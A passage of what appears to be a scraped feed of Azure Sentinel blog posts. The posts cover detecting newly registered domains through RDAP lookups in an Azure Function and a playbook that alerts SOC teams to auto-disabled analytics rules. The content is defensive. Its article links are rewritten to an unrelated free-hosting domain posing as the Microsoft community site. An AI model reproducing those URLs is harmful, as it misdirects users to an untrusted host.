image-alt="InfoPro_CL.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312455iC7A2FE2152580E69/image-size/large?v=v2&amp;px=999" role="button" title="InfoPro_CL.png" alt="InfoPro_CL.png" /></span></P> <P class="lia-indent-padding-left-30px"><STRONG>Note</STRONG>:&nbsp; 62 simulated entries related to the <EM><STRONG>"</STRONG><STRONG>Unusual MassDownload AIP Labe</STRONG><STRONG>l"</STRONG></EM>&nbsp;have been added.&nbsp;&nbsp;</P> <P>&nbsp;</P> <P><STRONG>Review the Anomalies table entries</STRONG></P> <P>KQL query:</P> <P>&nbsp;</P> <P>&nbsp;</P> <LI-CODE lang="powershell">Anomalies | where RuleName contains "(Preview) Unusual mass downgrade AIP label"</LI-CODE> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-center" image-alt="Query Results.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312459iAD462EDBD7E40A63/image-size/large?v=v2&amp;px=999" role="button" title="Query Results.png" alt="Query Results.png" /></span></P> <P>&nbsp;</P> <P>The "contains" operator in the KQL query allows for viewing results in both Flighting and Production status.&nbsp; Results from the script will be immediately visible in the InformationProtection_CL table, but it may take up to 12 hours to show results in the Anomalies table depending on when the data is imported with the PS script.&nbsp;&nbsp;</P> <P>&nbsp;</P> <P>Reply in the comments section with questions related to this release as well as others anomaly simulators you make like to see.</P> Thu, 30 Sep 2021 15:41:26 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/the-azure-sentinel-anomalies-simulator/ba-p/2738393 ChuckW 2021-09-30T15:41:26Z Querying WHOIS/Registration Data Access Protocol (RDAP) with Azure Sentinel and Azure Functions https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/querying-whois-registration-data-access-protocol-rdap-with-azure/ba-p/2774502 <P>With the amazing increase in domains and top-level domains (TLD's) on the Internet, it's difficult to know just where our users are going. Newly registered domains, domain generation algorithms, and typo-squatting are all tactics used by adversaries to compromise users. Recently I was talking with a customer about Azure Sentinel and they had a question about if and how they could raise an alert when a user received an email from a newly registered domain (by their definition this was any domain that had been registered in the last thirty days).&nbsp; While we don't have a built-in feature for this in Sentinel, it is possible to extend Sentinel to include this type of functionality. This blog post is about one way that such an extension could be created.&nbsp;</P> <P>&nbsp;</P> <H2><STRONG>Domain registration history</STRONG></H2> <P>&nbsp;</P> <P>First off, we need to understand domain registrations in general. To be usable on the Internet, all domain names must be registered so they can be propagated throughout the global DNS world. This information is created with a domain registrar or their resellers who are accredited by the&nbsp;Internet Corporation for Assigned Names and Numbers (ICANN),&nbsp;a not-for-profit public-benefit corporation who defines the policies and rules around domain registration. A simplified process flow is that when a domain is requested, the registrar will check if the domain name is available for registration and if so, will then create a "WHOIS" record with the domain name registrant's information.&nbsp; WHOIS is a protocol defined by the Internet Engineering Taskforce (IETF) in <A href="#" target="_blank" rel="noopener">RFC3912</A>. WHOIS is a TCP based connection using port 43 and responds in a human readable format. Each registrar maintains their WHOIS infrastructure, and you often must know just which registrar is authoritative for a particular domain.&nbsp; To keep the telephone book analogy going it's kind of like knowing that a person named "Matt Egen" exists somewhere in a telephone book in the world, but without knowing exactly&nbsp;<EM>where</EM> he is, you'd have to check all the telephone books around the world to find him. While this is fine for looking up occasional data (and back in 1985 there were a lot fewer domains (as well as much fewer Top-Level Domains (TLD) like .com, .net, .org, etc.)), it’s rather difficult to automate the process as the data isn't designed to be read by a machine.&nbsp; To counter this and account for not only the growing domain count but the invention of new "Generic Top Level Domains" (gTLD) like .store, .app, etc, ICANN and the Internet Engineering Task Force (IETF) came up with a new protocol called the <A href="#" target="_blank" rel="noopener">Registration Data Access Protocol</A> (RDAP).&nbsp; RDAP is a REST API with the same information as the traditional WHOS service, except its data is returned in a standardized JSON format. This makes it rather straightforward in parsing the returned data (although it still maintains a problem in finding the correct RDAP server / source to begin with, but we can deal with that) and automating the process.</P> <P>&nbsp;</P> <H2><STRONG>Extending Azure Sentinel with Azure Functions</STRONG></H2> <P>&nbsp;</P> <P>Azure Sentinel offers us several tools we can use to automate tasks.&nbsp; One method is to use Playbooks which are based on Azure Logic Apps and these provide an outstanding solution for creating a visual flow in your automation process.&nbsp; We could have used one here (in fact, in the v1 of this solution I did exactly that), however, there is another method we can use as well:&nbsp; Azure Functions. Azure Functions is a cloud service available on-demand that provides all the continually updated infrastructure and resources needed to run your applications. You focus on the pieces of code that matter most to you, and Functions handles the rest. Functions provides serverless compute for Azure. You can use Functions to build web APIs, respond to database changes, process IoT streams, manage message queues, and more.&nbsp; In this case, we’re going to use an Azure Function with a timer trigger to handle our RDAP query and run it on a regular schedule.</P> <P>&nbsp;</P> <H2><STRONG>Architecture and process flow</STRONG></H2> <P>&nbsp;</P> <P>The example follows a straightforward flow:</P> <P>&nbsp;</P> <OL> <LI>On a regular schedule the Azure Function will trigger.</LI> <LI>The Function will query the Azure Sentinel instance and call a Function which will get new domain names.&nbsp; We’re using a Function in Sentinel because we want it to be flexible and maintainable <EM>outside</EM> of the Azure Function.&nbsp; This means we can modify it whenever we have / want a new source of domain names.&nbsp; In this example we’re using the domains returned from the DeviceEvents table which comes from the Microsoft Defender 365 data connector.&nbsp; However, by using a Function it could be from <U>any</U> or multiple source(s) so long as it’s returned in the expected format.&nbsp; By using a Function and leveraging joins, we can handle all the sources we want.</LI> <LI>Using the returned domains, we will then call the RDAP “Bootstrap” service.&nbsp; This is a special list of all of the gTLDs and their requisite RDAP server endpoints.&nbsp; Think of this as a phone book of phone books.</LI> <LI>After getting the correct RDAP server, we then query it and get the results in JSON notation.</LI> <LI>We take the relevant information (in this example this is <U>just</U> the registration <STRONG>date</STRONG>) and then call back into our Azure Sentinel instance to store the data in a custom log table.</LI> <LI>Finally there is an Analytic Rule which runs against this custom log and if it finds a domain that is younger than the set criteria, it raises an alert.</LI> </OL> <P>&nbsp;</P> <H2><STRONG>Required Information for this example</STRONG></H2> <P>&nbsp;</P> <P>Since we’re going to be accessing data in an Azure Sentinel instance we need some information to enable that.</P> <P>&nbsp;</P> <H3><STRONG>Creating the Sentinel Function</STRONG></H3> <P>&nbsp;</P> <P>To retrieve the domain names that we want to resolve, we’re using a Sentinel Function. While it has a similar name to an Azure Function, it’s different. A Sentinel Function is written in the Kusto Query Language (KQL) and is a query that you save and then call later using an alias. You can use a Function in place of a table and use it like any other table. I’m not going to go too deep into the use cases or creation of Functions, but for our case we’re using it as a convenient tool so that we can maintain the query outside of our Azure Function and tune / adjust it as needed for different environments. If you like to learn more about Sentinel Functions, you can read about them here:&nbsp; <A href="#" target="_blank" rel="noopener">Functions in Azure Monitor log queries - Azure Monitor | Microsoft Docs</A>.&nbsp; For this use case, we’re going to show a straightforward example that calls into the DeviceNetworkEvents table, cleans up some of the data, checks to make sure it’s not in an exclusion list and finally that it’s not been already looked up in the last 90 days.</P> <P>&nbsp;</P> <PRE>// Function Name: GetDomainsForRDAP<BR />// ExcludedDomains is a dynamic list of domains and TLDs to not bother searching for<BR />// either because we already trust them, or perhaps we know they don’t have an RDAP server implementation.<BR />let ExcludedDomains = dynamic(["cn","io", "ms", "microsoft.com","somerandomsender.com"]);<BR />// Query the DeviceNetworkEvents table for the last 1 hour<BR />DeviceNetworkEvents<BR />| where TimeGenerated &gt;= ago(1h)<BR />| where isnotempty(RemoteUrl) //only return records that have a RemoteUrl value<BR />// A little cleanup just in case<BR />| extend parsedDomain = case(RemoteUrl contains "//", parse_url(RemoteUrl).Host, RemoteUrl) // handle scenarios where the RemoteUrl includes protocol data (e.g. http/s, etc.)<BR />| extend cleanDomain = split(parsedDomain,"/")[0] // throw away anything after the last “/” character<BR />| extend splitDomain = split(cleanDomain,".") //split the domain name on the “.”<BR />| extend Domain = tolower(strcat(splitDomain[array_length(splitDomain)-2],".",splitDomain[array_length(splitDomain)-1])) // recombine just the last two parts of the domain (the TLD and gTLD)<BR />| extend TLD = splitDomain[array_length(splitDomain)-1]&nbsp; // grab the gTLD so we can see if it’s in exclusion list along with the domain<BR />| where TLD !in(ExcludedDomains)<BR />| where Domain !in(ExcludedDomains)<BR />| summarize DistinctDomain = dcount(Domain) by Domain&nbsp; //De-duplicate the list<BR />| project Domain // return just the domain<BR />// Now join the results above to our table of already resolved domains.&nbsp; We don’t want to waste cycles querying for things we already know about<BR />//| join kind=leftanti (ResolvedDomains_CL<BR />//| where TimeGenerated &gt;= ago(90d)) on $left.Domain == $right.domainName_s //Uncomment these lines after the FIRST run of the Azure Function.</PRE> <P>&nbsp;</P> <P>One thing you may notice in the above Sentinel Function: the last two lines are commented out.&nbsp; This is because until the Azure Function runs the first time, the “ResolvedDomains_CL” custom log table doesn’t exist and this Sentinel Function will fail.&nbsp; After successfully running the Azure Function one time, you should then uncomment the last two lines.&nbsp;</P> <P>&nbsp;</P> <H3><STRONG>The Azure Function</STRONG></H3> <P>&nbsp;</P> <P>Now that we have the Sentinel Function out of the way, let’s talk about the Azure Function. As noted before, while having a similar name to a Sentinel Function, Azure Functions are completely different.&nbsp; Azure Functions is a cloud service available on-demand that provides all the continually updated infrastructure and resources needed to run your applications. You focus on the pieces of code that matter most to you, and Functions handles the rest. Azure Functions can be written in an array of different stacks including .NET, Node.Js, Python, Java, and even PowerShell Core and can be hosted on either Windows or Linux infrastructure. In this case we’re using .NET as the stack, the language is C#, and the infrastructure is Windows.</P> <P>&nbsp;</P> <P>To <EM>read</EM> data from Azure Sentinel, we need to create Azure AD application credentials with permission to the Azure Sentinel instance</P> <P>&nbsp;</P> <H3><STRONG>Creating an Azure AD Application with read permissions to Azure Sentinel</STRONG></H3> <P>&nbsp;</P> <P>This blog post is already getting a little long so rather than rewrite the steps to create an Azure AD Application, I’m just going to provide a link to my peer Rin Ure’s great blog post on the API’s and creating credentials: <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/access-azure-sentinel-log-analytics-via-api-part-1/ba-p/1248377" target="_blank" rel="noopener">Access Azure Sentinel Log Analytics via API (Part 1) - Microsoft Tech Community</A>&nbsp; The specific permission that we want to make sure we gran to the applications is covered in the linked article under the “Give the AAD Application permissions to your (Sentinel) Log Analytics Workspace” section.&nbsp; After following the steps in that article, we will have two of the settings that we will need for the RDAP Query engine:&nbsp; the Client ID and the Client Secret.&nbsp; We will be using these later when we configure the Azure Function.</P> <P>&nbsp;</P> <P>Ok, so now we have what we need to read the data, but what about writing back our results? To <EM>write</EM> data to the Azure Sentinel instance, we need the Workspace ID and either the Primary or Secondary key for the workspace.</P> <P>&nbsp;</P> <H3><STRONG>Getting the Workspace ID and Key for Azure Sentinel</STRONG></H3> <P>&nbsp;</P> <P>Azure Sentinel uses Log Analytics as the underlying data store.&nbsp; To write data to the Log Analytics workspace, we need the workspace ID and Key and can access these very simply in Azure Sentinel. In Sentinel, go to Settings...</P> <P>&nbsp;</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_0-1632321618709.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312070i672FD0F34AB2E8FE/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_0-1632321618709.png" alt="MattEgen_0-1632321618709.png" /></span></P> <P>&nbsp;</P> <P>Then, select “Workspace Settings” from the top of the resulting page...</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_1-1632321618715.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312071i55B8F884D3CA53E9/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_1-1632321618715.png" alt="MattEgen_1-1632321618715.png" /></span></P> <P>&nbsp;</P> <P>And finally, select “Agents Management”</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_2-1632321618719.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312072iCC53CD604134612A/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_2-1632321618719.png" alt="MattEgen_2-1632321618719.png" /></span></P> <P>&nbsp;</P> <P>This will take you to a screen that will show you the Workspace ID and two keys, a primary and secondary, that can be used to send data to the workspace...</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_3-1632321618721.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312073iE52DEA3DC0DF95A7/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_3-1632321618721.png" alt="MattEgen_3-1632321618721.png" /></span></P> <P>&nbsp;</P> <P>We can use either the primary or the secondary, it doesn’t matter which one we choose just remember to copy and save the Workspace ID and one of the keys as we’re going to need them in the next section.</P> <P>&nbsp;</P> <P>Now that we have the values we need to access Azure Sentinel we are going use then in our Azure Function by storing them in Application Settings.</P> <P>&nbsp;</P> <H3><STRONG>Azure Function – Application Settings</STRONG></H3> <P>&nbsp;</P> <P>As an Azure Function, the example can be configured via . Application settings are encrypted at rest and transmitted over an encrypted channel. Application Settings are exposed as environment variables for access by the application at runtime. This allows us to store keys and values in the Azure Function without having to store them in code. There are two advantages to this: 1) we’re not storing secrets in the actual code itself and 2) we can change them if we need to later.</P> <P>&nbsp;</P> <P>For this Function we use the following Application Settings:</P> <P>&nbsp;</P> <PRE>"SharedKey": "[LogAnalytics WorkSpace Primary or Secondary Key]",<BR />"WorkspaceID": "[LogAnalytics Workspace ID]",<BR />"LogName": "[The name of the custom log to store results. Recommend:ResolvedDomains]",<BR />"tenant_id": "[AzureAD TenantID]",<BR />"client_id": "[AzureAD Application Client ID]",<BR />"client_secret": "[AzureAD Application Client Secret]",<BR />"grant_type": "[Grant Type for Bearer Token]",<BR />"resource": "[Resource URL for Bearer Token]",<BR />“query_string”,”[The Sentinel function name to call]”</PRE> <P>&nbsp;</P> <P>These values are used in the C# code that does the actual work in the Azure Function and will be populated from the Application Settings into the code at runtime. This makes it very easy for us to change settings without having to rewrite / redeploy code.&nbsp; After deploying the application to an Azure Function, we configure the Application Settings on the Configuration blade...</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_4-1632321618734.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312075i38139A051C77F7E2/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_4-1632321618734.png" alt="MattEgen_4-1632321618734.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>For each of the settings, simply click the “New Application Setting” button and enter the name and value of the setting...</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_5-1632321618737.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312074iF3FC6BA5A987DBDC/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_5-1632321618737.png" alt="MattEgen_5-1632321618737.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>Now let’s look at the code and how we can deploy it to an Azure Function.</P> <P>&nbsp;</P> <H3><STRONG>RDAP Query Engine C# Code</STRONG></H3> <P>&nbsp;</P> <P>I’m not going to go through every line in the code, but instead leave that as an exercise for the reader.&nbsp; Keep in mind this is an&nbsp;<EM>example</EM> and as such could probably be improved.&nbsp;&nbsp;&nbsp;The code is hosted on GitHub here: <A href="#" target="_blank" rel="noopener">Azure-Sentinel/Tools/RDAP/RDAPQuery at master · Azure/Azure-Sentinel (github.com)</A>. However, I’m going to cover the main function and the overall structure.</P> <P>&nbsp;</P> <P>“<STRONG>CheckDomains</STRONG>”</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_6-1632321618745.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312076i50482FB43848439C/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_6-1632321618745.png" alt="MattEgen_6-1632321618745.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>CheckDomains is the initialization point for the code and is called by the Azure Function framework based on a Timer trigger (in fact CheckDomains is an alias for the interal “Run” function that Azure Functions is calling). The timer is set to fire at a set period of time (default every five minutes) and in turn makes all of the other calls to get authentication, retrieve data from Sentinel, query RDAP, and finally write the results back to Sentinel. Let’s map out this function...</P> <P>[create a visio of the function?]</P> <P>&nbsp;</P> <P><STRONG>&nbsp;“QueryData”</STRONG></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_7-1632321618756.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312078iD6D6FF0857298763/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_7-1632321618756.png" alt="MattEgen_7-1632321618756.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>One of the first things that CheckDomains does is call the QueryData function which is responsible for calling into Azure Sentinel and retrieving any new domains to lookup. It takes one parameter which is the actual query to execute. Since querying the data in Azure Sentinel requires us to authenticate, it first retrieves an OAUTH bearer token (via a call to “GetBearerToken()” and then uses it in the subsequent call to the Log Analytics API.&nbsp; If we receive a successful status code from the call, we then deserialize the results into a QueryResults object and return it back to the CheckDomains function.</P> <P>&nbsp;</P> <P>After calling QueryData, we run a ForEach() loop over the results, do a little cleanup (by splitting out the top-level domain (.com, .net, etc.) with a split() function) and then call BootStrapTLD.</P> <P><STRONG>&nbsp;</STRONG><STRONG>&nbsp;</STRONG></P> <P><STRONG>BootStrapTLD()</STRONG></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_8-1632321618765.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312077iBB4F7BB879099A35/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_8-1632321618765.png" alt="MattEgen_8-1632321618765.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>BootStrapTLD takes the passed in top-level domain (TLD) and uses it to call the IANA bootstrap URL at <A href="#" target="_blank" rel="noopener">https://data.iana.org/rdap/dns.json</A> (this is hardcoded as it’s supposed to never change) which is a JSON file that has all the different TLDs mapped out with the appropriate RDAP server URL that we can call to get the detailed information about the domain.&nbsp; We make a call to the JSON file and then deserialize it into a Services object. Since we deserialized the entire list, we then run a foreach loop over the returned values to check for a match with the TLD we’re searching for. When we have a match we then break out of the ForEach and return the value back to CheckDomains()</P> <P>Now that we have the RDAP server that is responsible for the TLD, it’s time to call it and get the information we want.</P> <P>&nbsp;</P> <P><STRONG>QueryRDAP</STRONG></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_9-1632321618772.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312079iC908B23EFF5EB41D/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_9-1632321618772.png" alt="MattEgen_9-1632321618772.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>This function is very straightforward as it simply calls the passed in URL, deserializes the results (if any) into an RDAPResponse object and then returns that back to CheckDomains.&nbsp; CheckDomains then parses the returned object to find the “events” node and specifically one with an eventType of “registration”. If we find one, we create a new “RDAPUpdate” object which just holds the domain name we looked up along with the registration date that was returned. This object is then passed to the WriteData function which will store it into Sentinel / Log Analytics.</P> <P>&nbsp;</P> <P><STRONG>WriteData()</STRONG></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_10-1632321618775.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312080i090E93FE50F858A1/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_10-1632321618775.png" alt="MattEgen_10-1632321618775.png" /></span></P> <P>&nbsp;</P> <P>&nbsp;</P> <P>WriteData is possibly the simplest function in all of this code as it just takes the passed object, converts it into a JSON string, builds a signature (using the Workspace ID and keys from earlier) and then calls PostData which does the actual write to Sentinel / Log Analytics.</P> <P>&nbsp;</P> <P><STRONG>PostData()</STRONG></P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_11-1632321618780.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312081i23CB68C7A25A6098/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_11-1632321618780.png" alt="MattEgen_11-1632321618780.png" /></span></P> <P>&nbsp;</P> <P>And finally, PostData() calls the Log Analytics API and commits our data.&nbsp;</P> <P>&nbsp;</P> <P><STRONG>So…I’ve got a bunch of domain names and their registration dates, now what?</STRONG></P> <P>&nbsp;</P> <P>Going back to our original need (alert on domains that are younger than 30 days), we can write a very simple query in the Logs blade of Sentinel to search for these:</P> <P>&nbsp;</P> <PRE>ResolvedDomains_CL<BR />| where TimeGenerated &gt;= ago(1h)<BR />| where registrationDate_t &gt;= ago(30d)</PRE> <P>And to automate this query, we could convert it into an Analytics rule to generate an Incident for an analyst to review by selecting the “New Alert” drop down and choosing “Create Azure Sentinel Alert”</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="MattEgen_12-1632321618785.png" style="width: 400px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/312082i8DCFE5860C45BDFF/image-size/medium?v=v2&amp;px=400" role="button" title="MattEgen_12-1632321618785.png" alt="MattEgen_12-1632321618785.png" /></span></P> <P>&nbsp;</P> <P>Another use case could be to create an enrichment query to add registration data during an investigation.&nbsp; For example, create a join() between a domain source table and the ResolvedDomains_CL table to add in the registration date for any domains seen, and then add that data to an analytic using the new <A href="https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/what-s-new-alert-enrichment-custom-details-and-entity-mapping/ba-p/2195409" target="_blank" rel="noopener">Custom Details feature</A>.</P> <P>&nbsp;</P> <H2><STRONG>Next steps / further improvements</STRONG></H2> <P>&nbsp;</P> <P>One thing I noticed in creating this example was that not every top-level domain has activated an RDAP server yet. Notably, a number of country TLDs are still using the traditional WHOIS infrastructure (this is why I added the ability to exclude domains and TLD’s in the GetDomainsForRDAP Sentinel Function).&nbsp; As a next step for this project, I am going to look to add traditional WHOS queries (via a TCP connection to port 43) in cases where RDAP cannot find a domain / receives an error. Also, the code currently doesn’t handle raw IP addresses (either IPv4 or IPv6) and instead just does a lookup and fails. I’m looking at modifying the code to support RDAP queries for IP addresses as well, but since it’s an IP address it doesn’t have a “registration date” per se. Would love some feedback on what you think would be useful information from an IP address.&nbsp; Look for this update soon.</P> <P>&nbsp;</P> <P>Until next time, happy hunting!</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> <P>&nbsp;</P> Wed, 29 Sep 2021 23:14:29 GMT https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/querying-whois-registration-data-access-protocol-rdap-with-azure/ba-p/2774502 Matt Egen 2021-09-29T23:14:29Z Monitoring Azure Sentinel Analytical Rules – Push Health Notifications https://gorovian.000webhostapp.com/?exam=t5/azure-sentinel/monitoring-azure-sentinel-analytical-rules-push-health/ba-p/2793694 <P>Azure Sentinel Analytical rules help Security Teams discover threats and anomalous behaviors to ensure full security coverage for your environment</P> <P>&nbsp;</P> <P>After connecting our data sources to Azure Sentinel, first we enable Analytical rules. Each data source comes with built-in, out-of-the-box templates to create threat detection rules.</P> <P>&nbsp;</P> <P>Analytics rules search for specific events or sets of events across your environment, alert you when certain event thresholds or conditions are reached, generate incidents for SOC to triage and investigate, and respond to threats with automated tracking and remediation processes.</P> <P>&nbsp;</P> <H3>Scenario: A scheduled rule failed to execute, or appears with AUTO DISABLED added to the name</H3> <P>It's a rare occurrence that a scheduled query rule fails to run, but it can happen. As shown in the image below, a customer had located several <EM>Scheduled Analytics Rules</EM> that had been Auto-disable in their environment.</P> <P>&nbsp;</P> <P><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Sreedhar_Ande_0-1632876975147.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/313464iFB009E7841CF960B/image-size/large?v=v2&amp;px=999" role="button" title="Sreedhar_Ande_0-1632876975147.png" alt="Sreedhar_Ande_0-1632876975147.png" /></span></P> <P>&nbsp;</P> <P>Azure Sentinel classifies failures up front as either <STRONG>transient</STRONG> or <STRONG>permanent</STRONG>, based on the specific type of the failure and the circumstances that led to it.</P> <P>&nbsp;</P> <P><FONT size="5">Transient failure</FONT></P> <P>&nbsp;</P> <P><FONT size="3">A transient failure occurs due to a circumstance which is temporary and will soon return to normal, at which point the rule execution will succeed. Some examples of failures that Azure Sentinel classifies as transient are:</FONT></P> <UL> <LI>A rule query takes too long to run and times out.</LI> <LI>Connectivity issues between data sources and Log Analytics, or between Log Analytics and Azure Sentinel.</LI> <LI>Any other new and unknown failure is considered transient.</LI> </UL> <P>In the event of a transient failure, Azure Sentinel continues trying to execute the rule again after predetermined and ever-increasing intervals, up to a point. After that, the rule will run again only at its next scheduled time. A rule will <EM><U>never be auto-disabled due to a transient failure</U></EM>.</P> <P>&nbsp;</P> <P><FONT size="5">Permanent failure</FONT></P> <P>&nbsp;</P> <P>A permanent failure occurs due to a change in the conditions that allow the rule to run, which without human intervention will not return to their former status. The following are some examples of failures that are classified as permanent:</P> <UL> <LI>The target workspace (on which the rule query operated) has been deleted.</LI> <LI>The target table (on which the rule query operated) has been deleted.</LI> <LI>Azure Sentinel had been removed from the target workspace.</LI> <LI>A function used by the rule query is no longer valid; it has been either modified or removed.</LI> <LI>Permissions to one of the data sources of the rule query were changed.</LI> <LI>One of the data sources of the rule query was deleted or disconnected.</LI> </UL> <P>In the event of a predetermined number of consecutive permanent failures, of the same type and on the same rule, Azure Sentinel stops trying to execute the rule, and takes the following steps:</P> <UL> <LI>Disables the rule.</LI> <LI>Adds the words&nbsp;<STRONG>"AUTO DISABLED"</STRONG>&nbsp;to the beginning of the rule's name.</LI> <LI>Adds the reason for the failure (and the disabling) to the rule's description.</LI> </UL> <P>It's a rare occurrence that a scheduled query rule gets auto-disabled, but it can happen. When it happens, following are the challenges for SOC to triage and investigate, and respond to threats with automated tracking and remediation processes</P> <UL> <LI>Alerts/Incidents will not be generated.</LI> <LI>Automated threat responses (Automation Rules/Playbooks) for your rules will not be triggered.</LI> </UL> <P>As of today, SOC Managers/SOC Analysts check the rule list regularly for the presence of auto-disabled rules manually. When it happens, there is no easy way to determine the presence of any auto-disabled rules automatically.</P> <P>&nbsp;</P> <P>There has been a need for a solution that will notify SOC Managers/SOC Analysts when a scheduled analytic rule has been auto-disabled. This blog is going to detail how to monitor Azure Sentinel Analytic rules periodically and send notification immediately to the SOC Team via email or Teams post in case of any analytic rules gets auto-disabled via&nbsp;<A href="#" target="_blank" rel="noopener">this Playbook</A>.</P> <H2>Deployment</H2> <P>This section explains how to use the ARM template to deploy the playbook to get notifications when an Azure Sentinel Analytic rule gets auto-disabled.</P> <P>To access the ARM template, navigate to <A href="#" target="_blank" rel="noopener">this Playbook</A></P> <OL> <LI>Click the&nbsp;<STRONG>Deploy to Azure/Deploy to Azure Gov</STRONG>&nbsp;Button:</LI> <LI>Enter values for the following parameters. <UL class="lia-list-style-type-circle"> <LI>"Azure Sentinel Workspace Name": Azure Log Analytics Workspace Name​</LI> <LI>“Azure Sentinel Workspace Resource Group": Azure Sentinel Workspace Resource Group Name</LI> <LI>"Mailing List": Email Ids separated by semi colon (;)</LI> <LI>"Teams Id": Microsoft Teams Id</LI> <LI>"Channel Id": Microsoft Teams Channel Id</LI> </UL> </LI> <LI>Click “Review &amp; Create”, after successful validation click on create</LI> </OL> <H2>Playbook Components</H2> <P>This section explains trigger and actions inside the workflow:</P> <UL> <LI>Recurrence trigger - The Logic App is activated by a Recurrence trigger whose frequency of execution can be adjusted to your requirements.</LI> <LI>HTTP GET – The Logic App hits Azure Sentinel Analytical rules REST API end point to get all the rules <UL> <LI>GET <A href="#" target="_blank" rel="noopener">https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.OperationalInsights/workspaces/{workspaceName}/providers/Microsoft.SecurityInsights/alertRules?api-version=2020-01-01</A></LI> </UL> </LI> <LI>For_Each – Loops through all the Analytical rules and determines if there are any rules that has enabled property set to “false” and Display Name has “Auto Disabled”</LI> <LI>Send Email – Send Email to mail recipients provided by the User</LI> <LI>Post Message – Post Message to Teams provided by the user</LI> </UL> <H2>Post Deployment</H2> <P>This section explains steps to perform after successful deployment:</P> <P>1. Authorize API Connections - used to connect Logic Apps to SaaS services, such as Office 365 &amp; Teams</P> <P class="lia-indent-padding-left-60px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Sreedhar_Ande_1-1632877861900.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/313466iFEBE9C9E4E4E5809/image-size/large?v=v2&amp;px=999" role="button" title="Sreedhar_Ande_1-1632877861900.png" alt="Sreedhar_Ande_1-1632877861900.png" /></span></P> <P>2.&nbsp;This playbook uses Managed Identity which grants permissions by using Azure role-based access control (Azure RBAC). The managed identity is authenticated with Azure AD, so you don’t have to store any credentials in code</P> <P class="lia-indent-padding-left-30px"><span class="lia-inline-image-display-wrapper lia-image-align-inline" image-alt="Sreedhar_Ande_2-1632877932666.png" style="width: 999px;"><img src="https://techcommunity.microsoft.com/t5/image/serverpage/image-id/313467i6C2438613D15A865/image-size/large?v=v2&amp;px=999" role="button" title="Sreedhar_Ande_2-1632877932666.png" alt="Sreedhar_Ande_2-1632877932666.png" /></span></P> <P class="lia-indent-padding-left-30px">&nbsp;</P> <P 